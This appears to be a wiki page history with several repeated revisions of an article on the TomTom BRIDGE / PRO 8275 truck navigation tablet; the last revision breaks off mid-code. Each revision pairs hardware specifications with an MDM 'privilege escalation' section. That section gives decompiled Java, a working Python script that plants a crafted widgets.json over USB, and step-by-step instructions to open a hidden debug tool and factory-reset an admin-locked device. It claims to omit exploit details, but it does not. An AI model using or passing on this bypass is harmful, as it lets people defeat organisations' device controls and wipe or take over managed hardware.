** Data transfer (MTP/PTP)
** Android Debug Bridge (ADB) access (if enabled)
** USB On-The-Go (OTG) for supported peripherals

==== microSD card slot ====
* Supports microSD / microSDHC cards
* Used for:
** Storage expansion (maps, applications, media)
** Offline data transfer and updates

== Software and platform ==
The TomTom BRIDGE platform is based on the Android Open Source Project (AOSP), enabling:
* Installation of custom APK applications
* Integration with enterprise backends
* Remote configuration and control via MDM systems
* Access to standard Android APIs alongside TomTom navigation APIs

TomTom maintains control over firmware and system updates to ensure regulatory compliance and device integrity.

== Lifecycle ==
Devices in the 4FI70 series have reached end-of-life status but may still receive limited support and updates.

----

== Device Administrator / MDM policy privilege escalation ==
This section is for educational and defensive security research purposes only.

=== Overview ===
The TomTom BRIDGE platform supports enterprise Mobile Device Management (MDM) and Android Device Administrator APIs. These features allow organizations to:
* Enforce security policies
* Control application installation
* Restrict user actions
* Remotely manage the device

Because the device runs 4.3 (kernel patched Jun 14 2017), it relies on legacy Device Administrator mechanisms rather than modern Android Enterprise (Device Owner) APIs.

==== createPackageContext misuse (research finding) ====
During analysis of the TomTom BRIDGE platform, a potential issue was identified related to the use of the Android API method <code>createPackageContext()</code>.

===== Background =====
The <code>createPackageContext()</code> method allows an application to create a context for another installed package. When used with specific flags (e.g., <code>CONTEXT_INCLUDE_CODE</code> or <code>CONTEXT_IGNORE_SECURITY</code>), it can enable access to that application's resources or code, depending on system permissions and signature alignment.

This mechanism is typically restricted to:
* System applications
* Applications signed with the same certificate
* Privileged contexts with elevated permissions

===== Observed behavior =====
Testing on the PRO 8275 (Android 4.3 with kernel patched up to 14 Jun 2017 and build 17.223.2780796.4807.122 OS italia-rel-17.2.21095) indicated that:
* Certain preinstalled or privileged applications expose functionality that can be accessed via <code>createPackageContext()</code>
* In some cases, access controls appeared weaker than expected for a hardened enterprise deployment
* The behavior may allow interaction with components or resources outside the normal application sandbox

===== Proof of concept (high-level demonstration) =====
This demonstration is intentionally limited and omits exploit details. It is intended to validate behavior in a controlled research environment only.

Weakness in the system is the widget.json fechter from Internal storage.
<blockquote style="font-size: 90%; max-width: 600px;">
<syntaxhighlight lang="java">
com.tomtom.navpad.widgetorganizerlib.WidgetInfoFetcher.fetchInstalledWidgets
</syntaxhighlight>
</blockquote>
and
<blockquote style="font-size: 90%; max-width: 600px;">
<syntaxhighlight lang="java">
com.tomtom.navpad.widgetorganizerlib.WidgetInfoFetcher.fetchInstalledApplications
</syntaxhighlight>
</blockquote>

Vulnerable function in the WidgetInfoFetcher class in question.
<syntaxhighlight lang="java" highlight="36">
private void fetchInstalledApplications(Context context, boolean showTestapps) {
Drawable iconDrawable;
if (!$assertionsDisabled && context == null) {
throw new AssertionError();
}
if (mAppShortcutsInfoCachedList != null) {
this.mWidgetInfoList.addAll(mAppShortcutsInfoCachedList);
generateWidgetInfoMap();
return;
}
Resources resources = context.getResources();
ArrayList<CachedActivityInfo> apps = createAppList(context, showTestapps);
int widgetIndex = 0;
for (CachedActivityInfo app : apps) {
ActivityInfo activityInfo = app.getActivityInfo();
String appPackageName = activityInfo.packageName;
String appClassName = activityInfo.name;
if (!NAVAPP_PACKAGE_NAME.equals(appPackageName) || !"com.tomtom.navpad.navapp.NavPadAppDrawerActivity".equals(appClassName)) {
if (this.mIsConfigurable || !NAVAPP_PACKAGE_NAME.equals(appPackageName) || !"com.tomtom.navpad.navapp.NavPadWidgetDrawerActivity".equals(appClassName)) {
int pageIndex = widgetIndex / 8;
int widgetIndexOnPage = widgetIndex % 8;
WidgetInfo wInfo = new WidgetInfo();
wInfo.setWidgetType(WidgetInfo.WidgetType.APPSHORTCUT);
wInfo.setIsFromDrawer(true);
wInfo.setId(widgetIndex + 1);
wInfo.setPackageName(appPackageName);
wInfo.setClassName(appClassName);
wInfo.setPageNumber(pageIndex + 1);
wInfo.setEnabled(true);
wInfo.setLayoutColumn(widgetIndexOnPage % 4);
wInfo.setLayoutRow(widgetIndexOnPage / 4);
wInfo.setBackgroundColor(resources.getColor(R.color.navpad_homescreen_background_color));
wInfo.setTextColor(resources.getColor(R.color.navpad_homescreen_appshortcut_text_color));
wInfo.setName(app.getLabel());
try {
Context otherAppCtx = context.createPackageContext(appPackageName, 2);
iconDrawable = otherAppCtx.getResources().getDrawableForDensity(activityInfo.getIconResource(), 320);
} catch (PackageManager.NameNotFoundException e) {
if (Log.W) {
Log.w(TAG, "Could not find package " + appPackageName + " to fetch larger icon.");
}
iconDrawable = activityInfo.loadIcon(context.getPackageManager());
} catch (Resources.NotFoundException e2) {
if (Log.W) {
Log.w(TAG, "Could not fetch xhdpi icon from package " + appPackageName + " reverting to default icon.");
}
iconDrawable = activityInfo.loadIcon(context.getPackageManager());
}
wInfo.setIconDrawable(iconDrawable);
this.mWidgetInfoList.add(wInfo);
widgetIndex++;
}
}
}
generateWidgetInfoMap();
mAppShortcutsInfoCachedList = this.mWidgetInfoList;
}
</syntaxhighlight>

Start the tablet in MDM mode or admin locked restricted mode. Start the '''PoC python script''' when the tablet is connected to the computer by MicroUSB wire and when a error occurs on the screen the code executed succesfully. Now press ok and swipe to left on the home screen and now you see '''Debug Intent Sender''', open it and fill in the action textbox '''"android.intent.action.MASTER_CLEAR"''' now press send broadcast and your locked device is '''factory reset'''.

PoC script (Windows only, pymtp on Linux is a incomplete fork and does not work).
<syntaxhighlight lang="python">
import os
import json
import time
import win32com.client

OUTPUT_FILE = "widgets.json"

JSON_DATA = {
"application": [
{
"package_name": "com.android.settings",
"class_name": "com.android.settings.DebugIntentSender",
"startcell": "2.11",
"endcell": "2.11"
}
]
}

with open(OUTPUT_FILE, "w") as f:
json.dump(JSON_DATA, f, indent=4)

shell = win32com.client.Dispatch("Shell.Application")
my_computer = shell.NameSpace(17)

tomtom_device = None
for item in my_computer.Items():
if "tomtom" in item.Name.lower():
tomtom_device = item
break

if not tomtom_device:
print("TomTom device not found.")
exit(1)

device_root = tomtom_device.GetFolder

device_root.CopyHere(os.path.abspath(OUTPUT_FILE))
time.sleep(2)

print(f"{OUTPUT_FILE} successfully injected DebugIntentSender.")
</syntaxhighlight>

<gallery widths="200px" heights="120px" perrow="3">
File:Error after injection.jpg|Error after injection
File:Debugintentsender.jpg|DebugIntentSender class on the homescreen
File:Broadcast.jpg|Broadcast MASTER_CLEAR intent
</gallery>

===== Unlocking Factory Tools =====
Go to About your TomTom device. Now top Model number 5 times.
<gallery widths="200px" heights="120px" perrow="1">
File:Factory tools.jpg|Factory Tools
</gallery>

===== Research paper =====
[[:File:Android createPackageContext Paper 10 5 0.pdf|Android createPackageContext Paper 10 5 0.pdf]]
[https://www.ndss-symposium.org/wp-content/uploads/2017/09/10_5_0.pdf Download PDF remote]

===== Disclosure status =====
This finding is based on internal testing and has not been publicly assigned a CVE at the time of writing.

TomTom BRIDGE 7" Truck/Pro 8275 (4FI70)

2026-04-04T01:26:54Z

Polymorphic7: final ver.

[[File:Tomtom0.png|right|300px]]
[[File:Tomtom1.png|right|300px]]

== Overview ==
The '''TomTom BRIDGE 7" Truck / PRO 8275 (model 4FI70)''' is a ruggedized, enterprise-grade GPS navigation and telematics device designed for commercial fleet and truck operations. It combines dedicated truck navigation with an open Android-based platform, allowing integration with business applications and fleet management systems such as WEBFLEET.

The device is part of the TomTom BRIDGE ecosystem, which provides customizable in-vehicle hardware for logistics, telematics, and workflow automation.

== Contents ==
__TOC__

== Product family ==
* TomTom BRIDGE platform (Android-based in-vehicle terminal)
* TomTom PRO 8275 Truck (7" driver terminal variant)
* Model identifiers:
** 4FI70 (with cellular/GPRS module)
** 4FI72 / 4FI73 (non-cellular variants)

== Key features ==
* 7-inch rugged touchscreen display
* Truck-specific navigation (routes optimized for size, weight, and restrictions)
* Open Android platform (AOSP-based)
* Support for custom enterprise applications
* Integration with fleet management systems (e.g., WEBFLEET)
* Built-in mobile device management (MDM) capabilities
* Lifetime maps and navigation services (subject to lifecycle support)
* Rear camera and vehicle integration support

== Hardware specifications ==
=== System ===
* Operating system: Android 4.3 (14 Jun 2017 kernel patches)
* Build number: '''17.223.2780796.4807.122 OS italia-rel-17.2.21095'''
* CPU: Qualcomm Snapdragon 400 (quad-core, 1.2 GHz)
* RAM: 1.5 GB
* Storage: 16 GB / 32 GB (expandable via SD card)

=== Display ===
* Resolution: 1280×720 (720p)
* Multi-touch capacitive screen

=== Connectivity ===
* Wi-Fi (2.4 GHz / 5 GHz)
* Bluetooth 4.0
* Cellular (model-dependent, e.g., 4FI70 includes GSM/LTE)
* USB (OTG support)
* CAN bus interface for vehicle integration

=== Sensors ===
* GPS / GLONASS GNSS receiver
* Accelerometer
* Gyroscope

=== Power ===
* 8–32V input by docking (compatible with 12V/24V vehicle systems)
* MicroUSB charging 5v

=== Device I/O ===
==== Docking connector ====
* Proprietary multi-pin docking interface
* Used for:
** Power delivery (via vehicle dock)
** CAN bus integration
** External peripherals (e.g., cameras, telematics modules)
* Enables fixed in-vehicle installation with secure mounting

==== USB ====
* Micro-USB port (front-facing)
* Supports:
** Device charging
** Data transfer (MTP/PTP)
** Android Debug Bridge (ADB) access (if enabled)
** USB On-The-Go (OTG) for supported peripherals

==== microSD card slot ====
* Supports microSD / microSDHC cards
* Used for:
** Storage expansion (maps, applications, media)
** Offline data transfer and updates

== Software and platform ==
The TomTom BRIDGE platform is based on the Android Open Source Project (AOSP), enabling:
* Installation of custom APK applications
* Integration with enterprise backends
* Remote configuration and control via MDM systems
* Access to standard Android APIs alongside TomTom navigation APIs

TomTom maintains control over firmware and system updates to ensure regulatory compliance and device integrity.

== Lifecycle ==
Devices in the 4FI70 series have reached end-of-life status but may still receive limited support and updates.

----

== Device Administrator / MDM policy privilege escalation ==
This section is for educational and defensive security research purposes only.

=== Overview ===
The TomTom BRIDGE platform supports enterprise Mobile Device Management (MDM) and Android Device Administrator APIs. These features allow organizations to:
* Enforce security policies
* Control application installation
* Restrict user actions
* Remotely manage the device

Because the device runs 4.3 (kernel patched Jun 14 2017), it relies on legacy Device Administrator mechanisms rather than modern Android Enterprise (Device Owner) APIs.

==== createPackageContext misuse (research finding) ====
During analysis of the TomTom BRIDGE platform, a potential issue was identified related to the use of the Android API method <code>createPackageContext()</code>.

===== Background =====
The <code>createPackageContext()</code> method allows an application to create a context for another installed package. When used with specific flags (e.g., <code>CONTEXT_INCLUDE_CODE</code> or <code>CONTEXT_IGNORE_SECURITY</code>), it can enable access to that application's resources or code, depending on system permissions and signature alignment.

This mechanism is typically restricted to:
* System applications
* Applications signed with the same certificate
* Privileged contexts with elevated permissions

===== Observed behavior =====
Testing on the PRO 8275 (Android 4.3 14 Jun 2017 kernel patches) indicated that:
* Certain preinstalled or privileged applications expose functionality that can be accessed via <code>createPackageContext()</code>
* In some cases, access controls appeared weaker than expected for a hardened enterprise deployment
* The behavior may allow interaction with components or resources outside the normal application sandbox

===== Proof of concept (high-level demonstration) =====
This demonstration is intentionally limited and omits exploit details. It is intended to validate behavior in a controlled research environment only.

Weakness in the system is the widget.json fechter from Internal storage.
<blockquote style="font-size: 90%; max-width: 600px;">
<syntaxhighlight lang="java">
com.tomtom.navpad.widgetorganizerlib.WidgetInfoFetcher.fetchInstalledWidgets
</syntaxhighlight>
</blockquote>
and
<blockquote style="font-size: 90%; max-width: 600px;">
<syntaxhighlight lang="java">
com.tomtom.navpad.widgetorganizerlib.WidgetInfoFetcher.fetchInstalledApplications
</syntaxhighlight>
</blockquote>

Vulnerable function in the WidgetInfoFetcher class in question.
<syntaxhighlight lang="java" highlight="36">
private void fetchInstalledApplications(Context context, boolean showTestapps) {
Drawable iconDrawable;
if (!$assertionsDisabled && context == null) {
throw new AssertionError();
}
if (mAppShortcutsInfoCachedList != null) {
this.mWidgetInfoList.addAll(mAppShortcutsInfoCachedList);
generateWidgetInfoMap();
return;
}
Resources resources = context.getResources();
ArrayList<CachedActivityInfo> apps = createAppList(context, showTestapps);
int widgetIndex = 0;
for (CachedActivityInfo app : apps) {
ActivityInfo activityInfo = app.getActivityInfo();
String appPackageName = activityInfo.packageName;
String appClassName = activityInfo.name;
if (!NAVAPP_PACKAGE_NAME.equals(appPackageName) || !"com.tomtom.navpad.navapp.NavPadAppDrawerActivity".equals(appClassName)) {
if (this.mIsConfigurable || !NAVAPP_PACKAGE_NAME.equals(appPackageName) || !"com.tomtom.navpad.navapp.NavPadWidgetDrawerActivity".equals(appClassName)) {
int pageIndex = widgetIndex / 8;
int widgetIndexOnPage = widgetIndex % 8;
WidgetInfo wInfo = new WidgetInfo();
wInfo.setWidgetType(WidgetInfo.WidgetType.APPSHORTCUT);
wInfo.setIsFromDrawer(true);
wInfo.setId(widgetIndex + 1);
wInfo.setPackageName(appPackageName);
wInfo.setClassName(appClassName);
wInfo.setPageNumber(pageIndex + 1);
wInfo.setEnabled(true);
wInfo.setLayoutColumn(widgetIndexOnPage % 4);
wInfo.setLayoutRow(widgetIndexOnPage / 4);
wInfo.setBackgroundColor(resources.getColor(R.color.navpad_homescreen_background_color));
wInfo.setTextColor(resources.getColor(R.color.navpad_homescreen_appshortcut_text_color));
wInfo.setName(app.getLabel());
try {
Context otherAppCtx = context.createPackageContext(appPackageName, 2);
iconDrawable = otherAppCtx.getResources().getDrawableForDensity(activityInfo.getIconResource(), 320);
} catch (PackageManager.NameNotFoundException e) {
if (Log.W) {
Log.w(TAG, "Could not find package " + appPackageName + " to fetch larger icon.");
}
iconDrawable = activityInfo.loadIcon(context.getPackageManager());
} catch (Resources.NotFoundException e2) {
if (Log.W) {
Log.w(TAG, "Could not fetch xhdpi icon from package " + appPackageName + " reverting to default icon.");
}
iconDrawable = activityInfo.loadIcon(context.getPackageManager());
}
wInfo.setIconDrawable(iconDrawable);
this.mWidgetInfoList.add(wInfo);
widgetIndex++;
}
}
}
generateWidgetInfoMap();
mAppShortcutsInfoCachedList = this.mWidgetInfoList;
}
</syntaxhighlight>

Start the tablet in MDM mode or admin locked restricted mode. Start the '''PoC python script''' when the tablet is connected to the computer by MicroUSB wire and when a error occurs on the screen the code executed succesfully. Now press ok and swipe to left on the home screen and now you see '''Debug Intent Sender''', open it and fill in the action textbox '''"android.intent.action.MASTER_CLEAR"''' now press send broadcast and your locked device is '''factory reset'''.

PoC script (Windows only, pymtp on Linux is a incomplete fork and does not work).
<syntaxhighlight lang="python">
import os
import json
import time
import win32com.client

OUTPUT_FILE = "widgets.json"

JSON_DATA = {
"application": [
{
"package_name": "com.android.settings",
"class_name": "com.android.settings.DebugIntentSender",
"startcell": "2.11",
"endcell": "2.11"
}
]
}

with open(OUTPUT_FILE, "w") as f:
json.dump(JSON_DATA, f, indent=4)

shell = win32com.client.Dispatch("Shell.Application")
my_computer = shell.NameSpace(17)

tomtom_device = None
for item in my_computer.Items():
if "tomtom" in item.Name.lower():
tomtom_device = item
break

if not tomtom_device:
print("TomTom device not found.")
exit(1)

device_root = tomtom_device.GetFolder

device_root.CopyHere(os.path.abspath(OUTPUT_FILE))
time.sleep(2)

print(f"{OUTPUT_FILE} successfully injected DebugIntentSender.")
</syntaxhighlight>

<gallery widths="200px" heights="120px" perrow="3">
File:Error after injection.jpg|Error after injection
File:Debugintentsender.jpg|DebugIntentSender class on the homescreen
File:Broadcast.jpg|Broadcast MASTER_CLEAR intent
</gallery>

===== Unlocking Factory Tools =====
Go to About your TomTom device. Now top Model number 5 times.
<gallery widths="200px" heights="120px" perrow="1">
File:Factory tools.jpg|Factory Tools
</gallery>

===== Research paper =====
[[:File:Android createPackageContext Paper 10 5 0.pdf|Android createPackageContext Paper 10 5 0.pdf]]
[https://www.ndss-symposium.org/wp-content/uploads/2017/09/10_5_0.pdf Download PDF remote]

===== Disclosure status =====
This finding is based on internal testing and has not been publicly assigned a CVE at the time of writing.

File:Tomtom1.png

2026-04-04T01:22:39Z

Polymorphic7:

File:Tomtom0.png

2026-04-04T01:22:24Z

Polymorphic7:

TomTom BRIDGE 7" Truck/Pro 8275 (4FI70)

2026-04-04T01:08:12Z

Polymorphic7: final fix

== Overview ==
The '''TomTom BRIDGE 7" Truck / PRO 8275 (model 4FI70)''' is a ruggedized, enterprise-grade GPS navigation and telematics device designed for commercial fleet and truck operations. It combines dedicated truck navigation with an open Android-based platform, allowing integration with business applications and fleet management systems such as WEBFLEET.

The device is part of the TomTom BRIDGE ecosystem, which provides customizable in-vehicle hardware for logistics, telematics, and workflow automation.

== Contents ==
__TOC__

== Product family ==
* TomTom BRIDGE platform (Android-based in-vehicle terminal)
* TomTom PRO 8275 Truck (7" driver terminal variant)
* Model identifiers:
** 4FI70 (with cellular/GPRS module)
** 4FI72 / 4FI73 (non-cellular variants)

== Key features ==
* 7-inch rugged touchscreen display
* Truck-specific navigation (routes optimized for size, weight, and restrictions)
* Open Android platform (AOSP-based)
* Support for custom enterprise applications
* Integration with fleet management systems (e.g., WEBFLEET)
* Built-in mobile device management (MDM) capabilities
* Lifetime maps and navigation services (subject to lifecycle support)
* Rear camera and vehicle integration support

== Hardware specifications ==
=== System ===
* Operating system: Android 4.3 (14 Jun 2017 kernel patches)
* Build number: 17.223.2780796.4807.122 OS italia-rel-17.2.21095
* CPU: Qualcomm Snapdragon 400 (quad-core, 1.2 GHz)
* RAM: 1.5 GB
* Storage: 16 GB / 32 GB (expandable via SD card)

=== Display ===
* Resolution: 1280×720 (720p)
* Multi-touch capacitive screen

=== Connectivity ===
* Wi-Fi (2.4 GHz / 5 GHz)
* Bluetooth 4.0
* Cellular (model-dependent, e.g., 4FI70 includes GSM/LTE)
* USB (OTG support)
* CAN bus interface for vehicle integration

=== Sensors ===
* GPS / GLONASS GNSS receiver
* Accelerometer
* Gyroscope

=== Power ===
* 8–32V input by docking (compatible with 12V/24V vehicle systems)
* MicroUSB charging 5v

=== Device I/O ===
==== Docking connector ====
* Proprietary multi-pin docking interface
* Used for:
** Power delivery (via vehicle dock)
** CAN bus integration
** External peripherals (e.g., cameras, telematics modules)
* Enables fixed in-vehicle installation with secure mounting

==== USB ====
* Micro-USB port (front-facing)
* Supports:
** Device charging
** Data transfer (MTP/PTP)
** Android Debug Bridge (ADB) access (if enabled)
** USB On-The-Go (OTG) for supported peripherals

==== microSD card slot ====
* Supports microSD / microSDHC cards
* Used for:
** Storage expansion (maps, applications, media)
** Offline data transfer and updates

== Software and platform ==
The TomTom BRIDGE platform is based on the Android Open Source Project (AOSP), enabling:
* Installation of custom APK applications
* Integration with enterprise backends
* Remote configuration and control via MDM systems
* Access to standard Android APIs alongside TomTom navigation APIs

TomTom maintains control over firmware and system updates to ensure regulatory compliance and device integrity.

== Lifecycle ==
Devices in the 4FI70 series have reached end-of-life status but may still receive limited support and updates.

----

== Device Administrator / MDM policy privilege escalation ==
This section is for educational and defensive security research purposes only.

=== Overview ===
The TomTom BRIDGE platform supports enterprise Mobile Device Management (MDM) and Android Device Administrator APIs. These features allow organizations to:
* Enforce security policies
* Control application installation
* Restrict user actions
* Remotely manage the device

Because the device runs 4.3 (kernel patched Jun 14 2017), it relies on legacy Device Administrator mechanisms rather than modern Android Enterprise (Device Owner) APIs.

==== createPackageContext misuse (research finding) ====
During analysis of the TomTom BRIDGE platform, a potential issue was identified related to the use of the Android API method <code>createPackageContext()</code>.

===== Background =====
The <code>createPackageContext()</code> method allows an application to create a context for another installed package. When used with specific flags (e.g., <code>CONTEXT_INCLUDE_CODE</code> or <code>CONTEXT_IGNORE_SECURITY</code>), it can enable access to that application's resources or code, depending on system permissions and signature alignment.

This mechanism is typically restricted to:
* System applications
* Applications signed with the same certificate
* Privileged contexts with elevated permissions

===== Observed behavior =====
Testing on the PRO 8275 (Android 4.3 14 Jun 2017 kernel patches) indicated that:
* Certain preinstalled or privileged applications expose functionality that can be accessed via <code>createPackageContext()</code>
* In some cases, access controls appeared weaker than expected for a hardened enterprise deployment
* The behavior may allow interaction with components or resources outside the normal application sandbox

===== Proof of concept (high-level demonstration) =====
This demonstration is intentionally limited and omits exploit details. It is intended to validate behavior in a controlled research environment only.

Weakness in the system is the widget.json fechter from Internal storage.

com.tomtom.navpad.widgetorganizerlib.WidgetInfoFetcher.fetchInstalledWidgets
and
com.tomtom.navpad.widgetorganizerlib.WidgetInfoFetcher.fetchInstalledApplications

<syntaxhighlight lang="java">
private void fetchInstalledApplications(Context context, boolean showTestapps) {
Drawable iconDrawable;
if (!$assertionsDisabled && context == null) {
throw new AssertionError();
}
if (mAppShortcutsInfoCachedList != null) {
this.mWidgetInfoList.addAll(mAppShortcutsInfoCachedList);
generateWidgetInfoMap();
return;
}
Resources resources = context.getResources();
ArrayList<CachedActivityInfo> apps = createAppList(context, showTestapps);
int widgetIndex = 0;
for (CachedActivityInfo app : apps) {
ActivityInfo activityInfo = app.getActivityInfo();
String appPackageName = activityInfo.packageName;
String appClassName = activityInfo.name;
if (!NAVAPP_PACKAGE_NAME.equals(appPackageName) || !"com.tomtom.navpad.navapp.NavPadAppDrawerActivity".equals(appClassName)) {
if (this.mIsConfigurable || !NAVAPP_PACKAGE_NAME.equals(appPackageName) || !"com.tomtom.navpad.navapp.NavPadWidgetDrawerActivity".equals(appClassName)) {
int pageIndex = widgetIndex / 8;
int widgetIndexOnPage = widgetIndex % 8;
WidgetInfo wInfo = new WidgetInfo();
wInfo.setWidgetType(WidgetInfo.WidgetType.APPSHORTCUT);
wInfo.setIsFromDrawer(true);
wInfo.setId(widgetIndex + 1);
wInfo.setPackageName(appPackageName);
wInfo.setClassName(appClassName);
wInfo.setPageNumber(pageIndex + 1);
wInfo.setEnabled(true);
wInfo.setLayoutColumn(widgetIndexOnPage % 4);
wInfo.setLayoutRow(widgetIndexOnPage / 4);
wInfo.setBackgroundColor(resources.getColor(R.color.navpad_homescreen_background_color));
wInfo.setTextColor(resources.getColor(R.color.navpad_homescreen_appshortcut_text_color));
wInfo.setName(app.getLabel());
try {
Context otherAppCtx = context.createPackageContext(appPackageName, 2);
iconDrawable = otherAppCtx.getResources().getDrawableForDensity(activityInfo.getIconResource(), 320);
} catch (PackageManager.NameNotFoundException e) {
if (Log.W) {
Log.w(TAG, "Could not find package " + appPackageName + " to fetch larger icon.");
}
iconDrawable = activityInfo.loadIcon(context.getPackageManager());
} catch (Resources.NotFoundException e2) {
if (Log.W) {
Log.w(TAG, "Could not fetch xhdpi icon from package " + appPackageName + " reverting to default icon.");
}
iconDrawable = activityInfo.loadIcon(context.getPackageManager());
}
wInfo.setIconDrawable(iconDrawable);
this.mWidgetInfoList.add(wInfo);
widgetIndex++;
}
}
}
generateWidgetInfoMap();
mAppShortcutsInfoCachedList = this.mWidgetInfoList;
}
</syntaxhighlight>

Start the tablet in MDM mode or admin locked restricted mode. Start the '''PoC python script''' when the tablet is connected to the computer by MicroUSB wire and when a error occurs on the screen the code executed succesfully. Now press ok and swipe to left on the home screen and now you see '''Debug Intent Sender''', open it and fill in the action textbox '''"android.intent.action.MASTER_CLEAR"''' now press send broadcast and your locked device is '''factory reset'''.

PoC script (Windows only, pymtp on Linux is a incomplete fork and does not work).
<syntaxhighlight lang="python">
import os
import json
import time
import win32com.client

OUTPUT_FILE = "widgets.json"

JSON_DATA = {
"application": [
{
"package_name": "com.android.settings",
"class_name": "com.android.settings.DebugIntentSender",
"startcell": "2.11",
"endcell": "2.11"
}
]
}

with open(OUTPUT_FILE, "w") as f:
json.dump(JSON_DATA, f, indent=4)

shell = win32com.client.Dispatch("Shell.Application")
my_computer = shell.NameSpace(17)

tomtom_device = None
for item in my_computer.Items():
if "tomtom" in item.Name.lower():
tomtom_device = item
break

if not tomtom_device:
print("TomTom device not found.")
exit(1)

device_root = tomtom_device.GetFolder

device_root.CopyHere(os.path.abspath(OUTPUT_FILE))
time.sleep(2)

print(f"{OUTPUT_FILE} successfully injected DebugIntentSender.")
</syntaxhighlight>

<gallery widths="200px" heights="120px" perrow="3">
File:Error after injection.jpg|Error after injection
File:Debugintentsender.jpg|DebugIntentSender class on the homescreen
File:Broadcast.jpg|Broadcast MASTER_CLEAR intent
</gallery>

===== Unlocking Factory Tools =====
Go to About your TomTom device. Now top Model number 5 times.
<gallery widths="200px" heights="120px" perrow="1">
File:Factory tools.jpg|Factory Tools
</gallery>

===== Research paper =====
[[:File:Android createPackageContext Paper 10 5 0.pdf|Android createPackageContext Paper 10 5 0.pdf]]
[https://www.ndss-symposium.org/wp-content/uploads/2017/09/10_5_0.pdf Download PDF remote]

===== Disclosure status =====
This finding is based on internal testing and has not been publicly assigned a CVE at the time of writing.

File:Factory tools.jpg

2026-04-04T01:05:36Z

Polymorphic7:

File:Broadcast.jpg

2026-04-04T01:00:05Z

Polymorphic7:

File:Debugintentsender.jpg

2026-04-04T00:59:31Z

Polymorphic7:

TomTom BRIDGE 7" Truck/Pro 8275 (4FI70)

2026-04-03T03:24:32Z

Polymorphic7:

== Overview ==
The '''TomTom BRIDGE 7" Truck / PRO 8275 (model 4FI70)''' is a ruggedized, enterprise-grade GPS navigation and telematics device designed for commercial fleet and truck operations. It combines dedicated truck navigation with an open Android-based platform, allowing integration with business applications and fleet management systems such as WEBFLEET.

The device is part of the TomTom BRIDGE ecosystem, which provides customizable in-vehicle hardware for logistics, telematics, and workflow automation.

== Contents ==
__TOC__

== Product family ==
* TomTom BRIDGE platform (Android-based in-vehicle terminal)
* TomTom PRO 8275 Truck (7" driver terminal variant)
* Model identifiers:
** 4FI70 (with cellular/GPRS module)
** 4FI72 / 4FI73 (non-cellular variants)

== Key features ==
* 7-inch rugged touchscreen display
* Truck-specific navigation (routes optimized for size, weight, and restrictions)
* Open Android platform (AOSP-based)
* Support for custom enterprise applications
* Integration with fleet management systems (e.g., WEBFLEET)
* Built-in mobile device management (MDM) capabilities
* Lifetime maps and navigation services (subject to lifecycle support)
* Rear camera and vehicle integration support

== Hardware specifications ==
=== System ===
* Operating system: Android 4.3 (14 Jun 2017 kernel patches)
* CPU: Qualcomm Snapdragon 400 (quad-core, 1.2 GHz)
* RAM: 1.5 GB
* Storage: 16 GB / 32 GB (expandable via SD card)

=== Display ===
* Resolution: 1280×720 (720p)
* Multi-touch capacitive screen

=== Connectivity ===
* Wi-Fi (2.4 GHz / 5 GHz)
* Bluetooth 4.0
* Cellular (model-dependent, e.g., 4FI70 includes GSM/LTE)
* USB (OTG support)
* CAN bus interface for vehicle integration

=== Sensors ===
* GPS / GLONASS GNSS receiver
* Accelerometer
* Gyroscope

=== Power ===
* 8–32V input by docking (compatible with 12V/24V vehicle systems)
* MicroUSB charging 5v

=== Device I/O ===
==== Docking connector ====
* Proprietary multi-pin docking interface
* Used for:
** Power delivery (via vehicle dock)
** CAN bus integration
** External peripherals (e.g., cameras, telematics modules)
* Enables fixed in-vehicle installation with secure mounting

==== USB ====
* Micro-USB port (front-facing)
* Supports:
** Device charging
** Data transfer (MTP/PTP)
** Android Debug Bridge (ADB) access (if enabled)
** USB On-The-Go (OTG) for supported peripherals

==== microSD card slot ====
* Supports microSD / microSDHC cards
* Used for:
** Storage expansion (maps, applications, media)
** Offline data transfer and updates

== Software and platform ==
The TomTom BRIDGE platform is based on the Android Open Source Project (AOSP), enabling:
* Installation of custom APK applications
* Integration with enterprise backends
* Remote configuration and control via MDM systems
* Access to standard Android APIs alongside TomTom navigation APIs

TomTom maintains control over firmware and system updates to ensure regulatory compliance and device integrity.

== Lifecycle ==
Devices in the 4FI70 series have reached end-of-life status but may still receive limited support and updates.

----

== Device Administrator / MDM policy privilege escalation ==
This section is for educational and defensive security research purposes only.

=== Overview ===
The TomTom BRIDGE platform supports enterprise Mobile Device Management (MDM) and Android Device Administrator APIs. These features allow organizations to:
* Enforce security policies
* Control application installation
* Restrict user actions
* Remotely manage the device

Because the device runs 4.3 (kernel patched Jun 14 2017), it relies on legacy Device Administrator mechanisms rather than modern Android Enterprise (Device Owner) APIs.

==== createPackageContext misuse (research finding) ====
During analysis of the TomTom BRIDGE platform, a potential issue was identified related to the use of the Android API method <code>createPackageContext()</code>.

===== Background =====
The <code>createPackageContext()</code> method allows an application to create a context for another installed package. When used with specific flags (e.g., <code>CONTEXT_INCLUDE_CODE</code> or <code>CONTEXT_IGNORE_SECURITY</code>), it can enable access to that application's resources or code, depending on system permissions and signature alignment.

This mechanism is typically restricted to:
* System applications
* Applications signed with the same certificate
* Privileged contexts with elevated permissions

===== Observed behavior =====
Testing on the PRO 8275 (Android 4.3 14 Jun 2017 kernel patches) indicated that:
* Certain preinstalled or privileged applications expose functionality that can be accessed via <code>createPackageContext()</code>
* In some cases, access controls appeared weaker than expected for a hardened enterprise deployment
* The behavior may allow interaction with components or resources outside the normal application sandbox

===== Proof of concept (high-level demonstration) =====
This demonstration is intentionally limited and omits exploit details. It is intended to validate behavior in a controlled research environment only.

Weakness in the system is the widget.json fechter from Internal storage.

com.tomtom.navpad.widgetorganizerlib.WidgetInfoFetcher.fetchInstalledWidgets
and
com.tomtom.navpad.widgetorganizerlib.WidgetInfoFetcher.fetchInstalledApplications

<syntaxhighlight lang="java">
private void fetchInstalledApplications(Context context, boolean showTestapps) {
Drawable iconDrawable;
if (!$assertionsDisabled && context == null) {
throw new AssertionError();
}
if (mAppShortcutsInfoCachedList != null) {
this.mWidgetInfoList.addAll(mAppShortcutsInfoCachedList);
generateWidgetInfoMap();
return;
}
Resources resources = context.getResources();
ArrayList<CachedActivityInfo> apps = createAppList(context, showTestapps);
int widgetIndex = 0;
for (CachedActivityInfo app : apps) {
ActivityInfo activityInfo = app.getActivityInfo();
String appPackageName = activityInfo.packageName;
String appClassName = activityInfo.name;
if (!NAVAPP_PACKAGE_NAME.equals(appPackageName) || !"com.tomtom.navpad.navapp.NavPadAppDrawerActivity".equals(appClassName)) {
if (this.mIsConfigurable || !NAVAPP_PACKAGE_NAME.equals(appPackageName) || !"com.tomtom.navpad.navapp.NavPadWidgetDrawerActivity".equals(appClassName)) {
int pageIndex = widgetIndex / 8;
